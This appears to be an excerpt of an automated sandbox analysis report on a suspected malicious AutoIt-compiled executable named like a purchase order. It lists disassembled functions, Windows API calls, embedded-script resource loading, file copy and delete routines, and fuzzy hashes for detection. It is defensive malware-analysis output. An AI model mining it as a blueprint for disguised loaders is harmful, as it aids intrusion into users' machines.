                                                                    • Instruction ID: 50bb9733143720ef05e386466da9bbd2bed0ed78afbf5453832dfac18a333dff
                                                                    • Opcode Fuzzy Hash: 70a133d286b338bf7d5f46d7a3b41b98d663499dc1603292ab0b86fafb230f49
                                                                    • Instruction Fuzzy Hash: D8510A70E08148EECF11EBB5DC15FED7B74AF46714F00426BF462A22A1DA708686FB61
                                                                    Function 00C149A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 996 c149a0-c14a00 call c17667 GetVersionExW call c17bcc 1001 c14a06 996->1001 1002 c14b0b-c14b0d 996->1002 1004 c14a09-c14a0e 1001->1004 1003 c4d767-c4d773 1002->1003 1007 c4d774-c4d778 1003->1007 1005 c14b12-c14b13 1004->1005 1006 c14a14 1004->1006 1010 c14a15-c14a4c call c17d2c call c17726 1005->1010 1006->1010 1008 c4d77a 1007->1008 1009 c4d77b-c4d787 1007->1009 1008->1009 1009->1007 1011 c4d789-c4d78e 1009->1011 1019 c4d864-c4d867 1010->1019 1020 c14a52-c14a53 1010->1020 1011->1004 1013 c4d794-c4d79b 1011->1013 1013->1003 1015 c4d79d 1013->1015 1018 c4d7a2-c4d7a5 1015->1018 1021 c14a93-c14aaa GetCurrentProcess IsWow64Process 1018->1021 1022 c4d7ab-c4d7c9 1018->1022 1023 c4d880-c4d884 1019->1023 1024 c4d869 1019->1024 1020->1018 1025 c14a59-c14a64 1020->1025 1032 c14aac 1021->1032 1033 c14aaf-c14ac0 1021->1033 1022->1021 1026 c4d7cf-c4d7d5 1022->1026 1030 c4d886-c4d88f 1023->1030 1031 c4d86f-c4d878 1023->1031 1027 c4d86c 1024->1027 1028 c14a6a-c14a6c 1025->1028 1029 c4d7ea-c4d7f0 1025->1029 1034 c4d7d7-c4d7da 1026->1034 1035 c4d7df-c4d7e5 1026->1035 1027->1031 1036 c4d805-c4d811 1028->1036 1037 c14a72-c14a75 1028->1037 1038 c4d7f2-c4d7f5 1029->1038 1039 c4d7fa-c4d800 1029->1039 1030->1027 1040 c4d891-c4d894 1030->1040 1031->1023 1032->1033 1041 c14ac2-c14ad2 call c14b37 1033->1041 1042 c14b2b-c14b35 GetSystemInfo 1033->1042 1034->1021 1035->1021 1047 c4d813-c4d816 1036->1047 1048 c4d81b-c4d821 1036->1048 1044 c4d831-c4d834 1037->1044 1045 c14a7b-c14a8a 1037->1045 1038->1021 1039->1021 1040->1031 1053 c14ad4-c14ae1 call c14b37 1041->1053 1054 c14b1f-c14b29 GetSystemInfo 1041->1054 1046 c14af8-c14b08 1042->1046 1044->1021 1050 c4d83a-c4d84f 1044->1050 1051 c14a90 1045->1051 1052 c4d826-c4d82c 1045->1052 1047->1021 1048->1021 1055 c4d851-c4d854 1050->1055 1056 c4d859-c4d85f 1050->1056 1051->1021 1052->1021 1061 c14ae3-c14ae7 GetNativeSystemInfo 1053->1061 1062 c14b18-c14b1d 1053->1062 1058 c14ae9-c14aed 1054->1058 1055->1021 1056->1021 1058->1046 1060 c14aef-c14af2 FreeLibrary 1058->1060 1060->1046 1061->1058 1062->1061
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00C149CD
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • GetCurrentProcess.KERNEL32(?,00C9FAEC,00000000,00000000,?), ref: 00C14A9A
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00C14AA1
                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C14AE7
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00C14AF2
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00C14B23
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00C14B2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                    • String ID:
                                                                    • API String ID: 1986165174-0
                                                                    • Opcode ID: 771eff3e61fb6547d34b0e23a978fdbe9f3201f5e7fe819061aebeb0399ec6bc
                                                                    • Instruction ID: f93c5dd7b6ead0d7e38c7a6945980b5e1cac89386120c3858514e801e4952193
                                                                    • Opcode Fuzzy Hash: 771eff3e61fb6547d34b0e23a978fdbe9f3201f5e7fe819061aebeb0399ec6bc
                                                                    • Instruction Fuzzy Hash: 8C91C53198D7C0DEC735DB6894506EAFFF5BF2A300B4449AED0D793A41D220E688E769
                                                                    Function 00C14E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1063 c14e89-c14ea1 CreateStreamOnHGlobal 1064 c14ec1-c14ec6 1063->1064 1065 c14ea3-c14eba FindResourceExW 1063->1065 1066 c14ec0 1065->1066 1067 c4d933-c4d942 LoadResource 1065->1067 1066->1064 1067->1066 1068 c4d948-c4d956 SizeofResource 1067->1068 1068->1066 1069 c4d95c-c4d967 LockResource 1068->1069 1069->1066 1070 c4d96d-c4d98b 1069->1070 1070->1066
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C14D8E,?,?,00000000,00000000), ref: 00C14E99
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C14D8E,?,?,00000000,00000000), ref: 00C14EB0
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F), ref: 00C4D937
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F), ref: 00C4D94C
                                                                    • LockResource.KERNEL32(00C14D8E,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F,00000000), ref: 00C4D95F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: e3532827732289bcff4fa2e693fa4ac1b7dadee96052de310ebdb50416e13ff7
                                                                    • Instruction ID: ec3ca390986dce1c7bfcf37dd801091686abca3f49e0e0749dcaddf68dcdf264
                                                                    • Opcode Fuzzy Hash: e3532827732289bcff4fa2e693fa4ac1b7dadee96052de310ebdb50416e13ff7
                                                                    • Instruction Fuzzy Hash: CC115EB5240700BFD7258B65EC48F6BBBBAFFC6B11F20426DF416C6250DBA1E8419660
                                                                    Function 00C7445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00C4E398), ref: 00C7446A
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00C7447B
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7448B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: 420bab4d1e85da9d9d50ae8ffb64f813b75c7327bdd41793024726552eabcdfb
                                                                    • Instruction ID: 1e19c7620982435d0a540c239cb81483652b38c292e5d6180820064c861f636c
                                                                    • Opcode Fuzzy Hash: 420bab4d1e85da9d9d50ae8ffb64f813b75c7327bdd41793024726552eabcdfb
                                                                    • Instruction Fuzzy Hash: C4E02033410900A742146B38EC0D7ED7B5C9F05335F24471BF939C10E0E7745D00A5D5
                                                                    Function 00C209D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C20A5B
                                                                    • timeGetTime.WINMM ref: 00C20D16
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C20E53
                                                                    • Sleep.KERNEL32(0000000A), ref: 00C20E61
                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00C20EFA
                                                                    • DestroyWindow.USER32 ref: 00C20F06
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C20F20
                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00C54E83
                                                                    • TranslateMessage.USER32(?), ref: 00C55C60
                                                                    • DispatchMessageW.USER32(?), ref: 00C55C6E
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C55C82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                    • API String ID: 4212290369-3242690629
                                                                    • Opcode ID: 867e3f28fa81b41f2a0ad816f9780ff496208faf683db1454ba239119f8d5d76
                                                                    • Instruction ID: 68a49700e93ba54ff1a38b543ebc825cd27b599fb6df6ac406a14070ac35169b
                                                                    • Opcode Fuzzy Hash: 867e3f28fa81b41f2a0ad816f9780ff496208faf683db1454ba239119f8d5d76
                                                                    • Instruction Fuzzy Hash: 0DB20374608741DFD724DF24C894BAEB7E0BF85304F24491EF899872A1CB71E989DB86
                                                                    Function 00C79155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00C78F5F: __time64.LIBCMT ref: 00C78F69
                                                                      • Part of subcall function 00C14EE5: _fseek.LIBCMT ref: 00C14EFD
                                                                    • __wsplitpath.LIBCMT ref: 00C79234
                                                                      • Part of subcall function 00C340FB: __wsplitpath_helper.LIBCMT ref: 00C3413B
                                                                    • _wcscpy.LIBCMT ref: 00C79247
                                                                    • _wcscat.LIBCMT ref: 00C7925A
                                                                    • __wsplitpath.LIBCMT ref: 00C7927F
                                                                    • _wcscat.LIBCMT ref: 00C79295
                                                                    • _wcscat.LIBCMT ref: 00C792A8
                                                                      • Part of subcall function 00C78FA5: _memmove.LIBCMT ref: 00C78FDE
                                                                      • Part of subcall function 00C78FA5: _memmove.LIBCMT ref: 00C78FED
                                                                    • _wcscmp.LIBCMT ref: 00C791EF
                                                                      • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79824
                                                                      • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79837
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C79452
                                                                    • _wcsncpy.LIBCMT ref: 00C794C5
                                                                    • DeleteFileW.KERNEL32(?,?), ref: 00C794FB
                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C79511
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C79522
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C79534
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                    • String ID:
                                                                    • API String ID: 1500180987-0
                                                                    • Opcode ID: 4c00a33f5ee1f415b609efb362e31805663f2fe15c1d7de84e302c8eb1517efd
                                                                    • Instruction ID: e25e9c67e9a14cbbb04740d6b88968984e16f8493228c298679b4036873b35c3
                                                                    • Opcode Fuzzy Hash: 4c00a33f5ee1f415b609efb362e31805663f2fe15c1d7de84e302c8eb1517efd
                                                                    • Instruction Fuzzy Hash: 66C15CB1D00229AADF25DF95CC85EDEB7BDEF45310F0080AAF609E7151EB309A859F61
                                                                    Function 00C1301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: 0eb41353976f5be06cbf20ab7e76badc7c35a5fe5d4333fe782014abf0d76d58
                                                                    • Instruction ID: 71672453e8d2f570e82b2d8c87a74e2d33695a88dfb93dcbb8109e8529ad4b4c
                                                                    • Opcode Fuzzy Hash: 0eb41353976f5be06cbf20ab7e76badc7c35a5fe5d4333fe782014abf0d76d58
                                                                    • Instruction Fuzzy Hash: 403105B1941219AFDB409FA4EC89BDDBBF4FB09310F10412EE580E62A0D7B5459ACF90
                                                                    Function 00C13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: cbe926299ddfcce67812fbdeab4c92dac54fc5bec9a4f0a6b5c4f92fe9ebec57
                                                                    • Instruction ID: f2731a3f60fdee52de31ae444f69b32aac15812c3477bb8e2a666026a00e40d4
                                                                    • Opcode Fuzzy Hash: cbe926299ddfcce67812fbdeab4c92dac54fc5bec9a4f0a6b5c4f92fe9ebec57
                                                                    • Instruction Fuzzy Hash: E921C0B1942618AFDB00DFA8EC89BDDBBF8FB08701F10412BFA10E62A0D7B145559F91
                                                                    Function 00C1708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00C14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CD52F8,?,00C137AE,?), ref: 00C14724
                                                                      • Part of subcall function 00C3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C17165), ref: 00C3052D
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C171A8
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C4E8C8
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C4E909
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00C4E947
                                                                    • _wcscat.LIBCMT ref: 00C4E9A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 2673923337-2727554177
                                                                    • Opcode ID: b8454103511494eedb2cc7e086708d0ba04e2c1ccb1a52796843a5d3978d35aa
                                                                    • Instruction ID: 46ce5c5417486c0b868a2466d8359699cfe9ada9f2fd1a52065faabac32df4b3
                                                                    • Opcode Fuzzy Hash: b8454103511494eedb2cc7e086708d0ba04e2c1ccb1a52796843a5d3978d35aa
                                                                    • Instruction Fuzzy Hash: 1C716C715093019EC700EF65E881AAFBBF8FF95310F40092EF445C71A1EB719949DB92
                                                                    Function 00C13A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C13A50
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00C13A5F
                                                                    • LoadIconW.USER32(00000063), ref: 00C13A76
                                                                    • LoadIconW.USER32(000000A4), ref: 00C13A88
                                                                    • LoadIconW.USER32(000000A2), ref: 00C13A9A
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C13AC0
                                                                    • RegisterClassExW.USER32(?), ref: 00C13B16
                                                                      • Part of subcall function 00C13041: GetSysColorBrush.USER32(0000000F), ref: 00C13074
                                                                      • Part of subcall function 00C13041: RegisterClassExW.USER32(00000030), ref: 00C1309E
                                                                      • Part of subcall function 00C13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C130AF
                                                                      • Part of subcall function 00C13041: InitCommonControlsEx.COMCTL32(?), ref: 00C130CC
                                                                      • Part of subcall function 00C13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C130DC
                                                                      • Part of subcall function 00C13041: LoadIconW.USER32(000000A9), ref: 00C130F2
                                                                      • Part of subcall function 00C13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C13101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$AutoIt v3
                                                                    • API String ID: 423443420-4155596026
                                                                    • Opcode ID: 1a63197033b604bd4e3f58479252a33be0947e33389b3f6625b545e63fbab157
                                                                    • Instruction ID: cfe1d9f90afb732822162ea30104adfbaf16c267a76ce14597b0ebecb4fac47a
                                                                    • Opcode Fuzzy Hash: 1a63197033b604bd4e3f58479252a33be0947e33389b3f6625b545e63fbab157
                                                                    • Instruction Fuzzy Hash: 10213770902308AFEB10DFA4EC09BAD7BB0FB08716F10012BF504EA2A1D7B556589F84
                                                                    Function 00C13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 767 c13633-c13681 769 c136e1-c136e3 767->769 770 c13683-c13686 767->770 769->770 773 c136e5 769->773 771 c136e7 770->771 772 c13688-c1368f 770->772 777 c4d0cc-c4d0fa call c21070 call c21093 771->777 778 c136ed-c136f0 771->778 774 c13695-c1369a 772->774 775 c1374b-c13753 PostQuitMessage 772->775 776 c136ca-c136d2 DefWindowProcW 773->776 780 c4d154-c4d168 call c72527 774->780 781 c136a0-c136a2 774->781 782 c13711-c13713 775->782 783 c136d8-c136de 776->783 812 c4d0ff-c4d106 777->812 784 c136f2-c136f3 778->784 785 c13715-c1373c SetTimer RegisterWindowMessageW 778->785 780->782 806 c4d16e 780->806 787 c13755-c13764 call c144a0 781->787 788 c136a8-c136ad 781->788 782->783 791 c136f9-c1370c KillTimer call c1443a call c13114 784->791 792 c4d06f-c4d072 784->792 785->782 789 c1373e-c13749 CreatePopupMenu 785->789 787->782 795 c136b3-c136b8 788->795 796 c4d139-c4d140 788->796 789->782 791->782 799 c4d074-c4d076 792->799 800 c4d0a8-c4d0c7 MoveWindow 792->800 804 c4d124-c4d134 call c72d36 795->804 805 c136be-c136c4 795->805 796->776 802 c4d146-c4d14f call c67c36 796->802 808 c4d097-c4d0a3 SetFocus 799->808 809 c4d078-c4d07b 799->809 800->782 802->776 804->782 805->776 805->812 806->776 808->782 809->805 813 c4d081-c4d092 call c21070 809->813 812->776 817 c4d10c-c4d11f call c1443a call c1434a 812->817 813->782 817->776
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00C136D2
                                                                    • KillTimer.USER32(?,00000001), ref: 00C136FC
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C1371F
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C1372A
                                                                    • CreatePopupMenu.USER32 ref: 00C1373E
                                                                    • PostQuitMessage.USER32(00000000), ref: 00C1374D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: TaskbarCreated
                                                                    • API String ID: 129472671-2362178303
                                                                    • Opcode ID: e36f3a80b58e8b5bb46bff031bafe61ef4725dfad68be834665e86fe1a3fdbf9
